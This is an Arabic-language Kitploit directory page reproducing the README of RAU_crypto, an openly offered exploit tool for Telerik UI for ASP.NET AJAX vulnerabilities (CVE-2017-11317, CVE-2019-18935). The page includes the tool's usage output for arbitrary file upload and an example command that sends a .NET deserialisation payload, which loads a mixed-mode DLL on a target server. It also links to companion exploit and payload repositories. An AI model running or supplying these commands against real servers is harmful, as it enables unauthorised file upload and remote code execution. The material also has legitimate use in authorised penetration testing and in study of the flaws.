Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE_2019_18935 — هذا المشروع يخص CVE-2019-18935 | Kitploit
أدوات/GitHubGitHub/thanhuutuan/cve_2019_18935
أدوات التشفير/فك التشفيرتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubthanhuutuan/cve_2019_18935

CVE_2019_18935

هذا المشروع يخص CVE-2019-18935

عرض المستودع
2منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RAU_crypto

Language

استغلال مدمج لـ Telerik UI لـ ASP.NET AJAX.

  • تحميل ملف لـ CVE-2017-11317 و CVE-2017-11357 - سيرفع الملف تلقائيًا
  • إلغاء تسلسل .NET لـ CVE-2019-18935

لكي يعمل الاستغلال، تحتاج عمومًا إلى إصدار بمفاتيح مشفرة (hard coded keys)، أو تحتاج إلى معرفة المفتاح، على سبيل المثال إذا كان بإمكانك الكشف عن محتويات web.config. يسمح الاستغلال أيضًا بتشفير وفك تشفير rauPostData المستخدم مع Telerik.Web.UI.WebResource.axd?type=rau بشكل مباشر.

المتطلبات

  • بايثون >= 3.6 مع pycryptodome (https://www.pycryptodome.org/en/latest/src/installation.html) - يتم التثبيت باستخدام pip3 install pycryptodome أو pip3 install pycryptodomex

منشور على exploit-db (نسخة قديمة)

  • https://www.exploit-db.com/exploits/43874/

انظر أيضًا

من المحتمل أن يكون استغلالي الآخر لـ Telerik UI (لـ CVE-2017-9248) ذا فائدة أيضًا. متاح هنا:

  • https://github.com/bao7uo/dp_crypto

المهام

  • وظيفة HMAC المفقودة للإصدارات الأحدث.
  • القدرة على تحديد مفتاح مخصص.
  • وسيط سطر الأوامر لتنفيذ dll مختلط (في هذه الأثناء استخدم مثال حمولة إلغاء تسلسل .NET المقدمة أدناه).
  • أداة منفصلة لاختبار dll مختلط.
  • توفير تعليمات المصدر/التجميع لـ dll مختلط.
  • القوة العمياء للإصدارات.

ملاحظة - العناصر الأربعة الأخيرة مكتملة ولكن لم يتم إصدارها.

الثغرات

ثغرة تحميل الملف (CVE-2017-11317) تم اكتشافها بواسطة آخرين، أعتقد أن الشكر يعود لـ @straight_blast @pwntester @olekmirosh. بعد فترة وجيزة من الإعلان عنها، صادفت مكتبة Telerik أثناء عملي، لذا قمت بالبحث فيها وفي الثغرة وكتبت هذا الاستغلال في يوليو 2017. كما أبلغت عن CVE-2017-11357 المتعلق بمرجع الكائن المباشر غير الآمن.

https://www.telerik.com/support/kb/aspnet-ajax/upload-%28async%29/details/insecure-direct-object-reference

ثغرة إلغاء تسلسل .NET (CVE-2019-18935) تم اكتشافها بواسطة @mwulftange.

https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization

الاستخدام

root@kitploit:~
$ ./RAU_crypto.py 

RAU_crypto by Paul Taylor / @bao7uo 
CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation

Usage:

Decrypt a ciphertext:               -d ciphertext
Decrypt rauPostData:                -D rauPostData
Encrypt a plaintext:                -e plaintext

Generate file upload rauPostData:   -E c:\\destination\\folder Version
Generate all file upload POST data: -p c:\\destination\\folder Version ../local/filename
Upload file:                        -P c:\\destination\\folder Version c:\\local\\filename url [proxy]

Generate custom payload POST data : -c partA partB
Send custom payload:                -C partA partB url [proxy]

Example URL:               http://target/Telerik.Web.UI.WebResource.axd?type=rau
Example Version format:    2016.2.504
Example optional proxy:    127.0.0.1:8080

N.B. Advanced settings e.g. custom keys or PBKDB algorithm can be found by searching source code for: ADVANCED_SETTINGS
$

ملاحظة: يمكن العثور على الإعدادات المتقدمة مثل المفاتيح المخصصة أو خوارزمية PBKDB من خلال البحث في الكود المصدري عن: ADVANCED_SETTINGS

مثال - فك التشفير

لقطة شاشة لفك التشفير

مثال - تحميل ملف عشوائي

لقطة شاشة للتحميل

حمولة مخصصة (إلغاء تسلسل .NET)

للحصول على تفاصيل حول الحمولات المخصصة لإلغاء تسلسل .NET، هناك مقال رائع بقلم @mwulftange الذي اكتشف هذه الثغرة على مدونة Code White على الرابط التالي.

  • https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html

روابط أخرى ذات صلة.

  • https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
  • https://threatvector.cylance.com/en_us/home/implications-of-loading-net-assemblies.html
  • https://thewover.github.io/Mixed-Assemblies/

مثال على حمولة إلغاء تسلسل .NET:

root@kitploit:~
$ ./RAU_crypto.py -C '{"Path":"file:///c:/users/public/documents/mixedmode64.dll"}' 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' http://target/Telerik.Web.UI.WebResource.axd?type=rau

لـ DLL الوضع المختلط، انظر مستودع github الآخر الخاص بي:

  • https://github.com/bao7uo/MixedUp

شكر خاص لـ @irsdl الذي ألهم ميزة الحمولة المخصصة.

تنزيل الأداة